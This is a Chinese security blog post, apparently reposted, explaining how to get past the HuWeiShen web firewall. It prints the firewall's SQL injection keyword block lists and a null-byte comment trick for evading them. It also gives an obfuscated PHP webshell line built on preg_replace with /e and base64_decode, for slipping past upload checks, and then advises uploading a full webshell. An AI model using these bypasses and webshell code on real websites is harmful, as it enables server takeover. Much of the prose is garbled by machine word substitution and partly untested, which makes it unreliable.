|
|
|
联系客服020-83701501

对护卫神防火墙的分析

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
对掩护神防火墙的分析

上个星期很不给力,原本答应住手一个主题报告的,事后只讲了burpsuite的一种用法。很对不起自身,这个星期的议题是绕过,尽管这次来的人比拟少,无非会议还是得继续。分享依旧是严重的….

这次我担当分析的是掩护神零碎,怎么说,这玩意在要害字检测上几乎很弱小,检测划定或许本人增多,也或许遵循官方下载的来。分析如下:

1、划定匹配

掩护神零碎对三种提交参数的舆论都住手了匹配,GET POST COOKIES。主要代码如下

GET舆论匹配的数并吞:

Default
12345678910111213141516171819202122232425262728293031323334 *xp_cmdshell* *and*db_name()*>*0* *and*user*>*0* *cacls.exe*:* *exec*copy* *insert*exec* *bulk*insert*exec* *select*is_srvrolemember* *use*model* *select*is_member* *declare*sysname* *xp_availablemedia* *xp_dirtree* *xp_terminate_process* *sp_dropextendedproc* *exec*sp_addlogin* *xp_regdeletekey* *exec*xp_regread* *insert*temp*exec* *exec*xp_regenumvalues*’* *exec*xp_regwrite*’* *exec*xp_regread*’* *exec*xp_regdeletevalue*’* *declare*@*char* *exec*xp_regaddmultistring*’* *exec*xp_regdeletekey*’* *exec*xp_regenumvalues*’* *exec*xp_regread*’* *exec*xp_regremovemultistring*’* *exec*xp_regwrite*’* *declare*@* *union*select* *select*from* *update*set*

POST舆论匹配的参数有:

Default
123456789101112131415161718192021222324252627282930313233 *xp_cmdshell* *and*db_name()*>*0* *and*user*>*0* *cacls.exe*:* *exec*copy* *insert*exec* *bulk*insert*exec**select*is_srvrolemember* *use*model* *select*is_member* *declare*sysname* *xp_availablemedia* *xp_dirtree* *xp_terminate_process* *sp_dropextendedproc* *exec*sp_addlogin* *xp_regdeletekey* *exec*xp_regread* *insert*temp*exec* *exec*xp_regenumvalues*’* *exec*xp_regwrite*’* *exec*xp_regread*’* *exec*xp_regdeletevalue*’* *declare*@*char* *exec*xp_regaddmultistring*’* *exec*xp_regdeletekey*’* *exec*xp_regenumvalues*’* *exec*xp_regread*’* *exec*xp_regremovemultistring*’* *exec*xp_regwrite*’* *declare*@* *union*select* *select*from*

cookie舆论匹配的参数有:

Default
12345678910111213141516171819202122232425262728293031323334 *xp_cmdshell* *and*db_name()*>*0* *and*user*>*0* *cacls.exe*:* *exec*copy* *insert*exec* *bulk*insert*exec* *select*is_srvrolemember* *use*model* *select*is_member* *declare*sysname* *xp_availablemedia* *xp_dirtree* *xp_terminate_process* *sp_dropextendedproc* *exec*sp_addlogin* *xp_regdeletekey* *exec*xp_regread* *insert*temp*exec* *exec*xp_regenumvalues*’* *exec*xp_regwrite*’* *exec*xp_regread*’* *exec*xp_regdeletevalue*’* *declare*@*char* *exec*xp_regaddmultistring*’* *exec*xp_regdeletekey*’* *exec*xp_regenumvalues*’* *exec*xp_regread*’* *exec*xp_regremovemultistring*’* *exec*xp_regwrite*’* *declare*@* *union*select* *select*from* *update*set*

这些,根蒂上涵盖了部分我晓得的注入舆论,或许说很完满。

实测缔造,绕过的舆论还是有的,或许经过轨范对%00这个截断符的利用,来住手截断,假设,咱们在传送参数的时候,掩护神在处理%00的数据时,截断,会是什么环境呢,该当是不会有反面的数据,因此,咱们或许攻破划定,住手处理。

测试如下:

先在mysql数据库里面测试:

Default
1 select/*%00*/* from admin;

返回了局,当然,假设在/**/里面到场感到号,mysql会出不停的接管参数,所以不克不及用。咱们用下面这句便可,php的版本契合的话 /*%00*/该当会作为参数住手传送进入数据据,而此时,掩护神零碎已经没法辨认规了。

当然,在测试的时候,当地搭建的情况有点题目,php没有成功加载mysql模块,不绝没法测试理论的php处理能否切确,无非经过对fck上传的猜测,该当是成功利用的。

91ri.org这里引见另一种攻破舆论 详见:《攻破掩护神之见招拆招》

2、上传划定

掩护神零碎有上传爱崇的工具,缔造,其实在post的数据中,不出现要害函数便或许间接绕过,只需上传成功,后台运行不会影响

或许利用:

Default
12345 $code=’xxx’; $x=str_replace(‘f’,””,”bfafsfef6f4f_ffdffeffcffoffdffef”); preg_replace(‘’a’eis’,’e’.’v’.’a’.’l’.’($x($code))’,’a’);

这种加密舆论去住手绕过就好了。

假设是一句话的话,注意连接舆论,不要用菜刀,菜刀必然不行的。

在网页版的客户端吧,或许或许间接上传大马就好了。

更多攻破掩护神的舆论参考:《将代码换行绕过网站爱崇零碎》及《过掩护神PHP一句话》

作者conqu3r由网络安全攻防研究室(www.91ri.org)信息安全小组收集收拾整顿,转载请注明来由。

别的的尚未分析完,到时再增多形式吧,顺便收拾整顿下绕过注入的舆论!

数安新闻+更多

证书相关+更多